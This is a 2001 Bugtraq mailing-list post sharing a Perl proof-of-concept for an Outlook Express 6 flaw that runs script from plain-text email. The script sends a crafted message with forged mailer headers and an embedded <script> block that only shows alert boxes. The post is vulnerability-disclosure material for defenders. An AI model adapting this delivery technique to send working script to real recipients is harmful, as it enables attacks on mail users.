Proof-Of-Concept Perl Script for Bugtraq-ID: #3334

From: Mario Schmidt (infoat_private)
Date: Sat Sep 15 2001 - 11:17:22 PDT

Next message: aleph1at_private: "Statically Detecting Likely Buffer Overflow Vulnerabilities"

Previous message: Marco van Berkum: "Majordomo default vulns"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Saturday, September 15, 2001

Following is a Proof-Of-Concept script, written in 
Perl, for the Bugtraq-ID: #3334 security issue,
named "Microsoft Outlook Express 6 Plain Text 
Message Script Execution". Credits for this 
issue goes to http-equivat_private [mailto:http-
equivat_private], who originally found 
this bug.

Usage of this script is very simple. Edit the perl script 
and add your favourite SMTP mail host 
and your e-mail address, as the program parameter 
and finally execute it.

The script is avaible for download as bug3334.pl 
[http://pcfon.de/ms.security/bug3334.pl].

#!/usr/local/bin/perl
#
# bug3334.pl
#
# ms.security
#
# Microsoft Outlook Express 6
# Plain Text Message Script Execution
#
# Proof-Of-Concept Perl Script
#
# Version: [0.0.1]
# Last Edit: [2001-09-15]
# Coding: ms.security [infoat_private]
#
# Bugtraq: #3334 
[http://www.securityfocus.com/bid/3334]
# Credit: http-equivat_private [http-
equivat_private]
#

use Net::SMTP;				
	# smtp mailer

# *** Program parameter ***

$mailer='mailhost';				# 
smtp host
$to='your@e-mail.com';			
	# receiver address

# *** Program information ***

@info=
(
  "\nms.security\n\n",
  "Microsoft Outlook Express 6\n",
  "Plain Text Message Script Execution\n\n",
  "Proof-Of-Concept Perl Script\n\n",
  "Version: [0.0.1]\n",
  "Last Edit: [2001-09-15]\n",
  "Coding: ms.security [info\@pcfon.de]\n\n",
  "Bugtraq: #3334 
[http://www.securityfocus.com/bid/3334]\n",
  "Credit: http-equiv\@excite.com [http-
equiv\@excite.com]\n\n"
);

# *** Message header ***

@header=
(
  'To: ',$to,"\n",
  "MIME-Version: 1.0\n",
  "Content-Type: text/plain\n",
  "charset=\"Windows-1252\"\n",
  "Content-Transfer-Encoding: 7bit\n",
  "X-Priority: 3\n",
  "X-MSMail-Priority: Normal\n",
  "X-Mailer: Microsoft Outlook Express 6.00.2600.0000
\n",
  "X-MIMEOLE: Produced By Microsoft MimeOLE 
V6.00.2600.0000\n",
  "\n"
);

# *** JavaScript code ***

@script=
(
  "<script>",
  "alert(\"freak\");",
  "alert(\"show\")",
  "</script>"
);

# *** Mail message via smtp mailer ***

print @info;				
	# info message
print "Connecting to $mailer ...\n";		# 
debug message
$smtp = Net::SMTP->new($mailer);		# 
smtp constructor
$smtp->mail($to);				# 
mail methode
$smtp->to($to);				
	# to methode
print "Sending messaging to $to ...\n";		# 
debug message
$smtp->data();				
	# begin of data
$smtp->datasend(@header);			# 
message header
$smtp->datasend(@script);			# 
script code
$smtp->dataend();				# 
end of data
$smtp->quit;				
	# terminate smtp
print "Done.\n";				
	# debug message

# (c) 2001, ms.security, Germany. All rights reserved.

ms.security
M. Schmidt 

Web: http://pcfon.de/ms.security/
Mail: mailto:infoat_private

Next message: aleph1at_private: "Statically Detecting Likely Buffer Overflow Vulnerabilities"
Previous message: Marco van Berkum: "Majordomo default vulns"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Sep 16 2001 - 17:01:03 PDT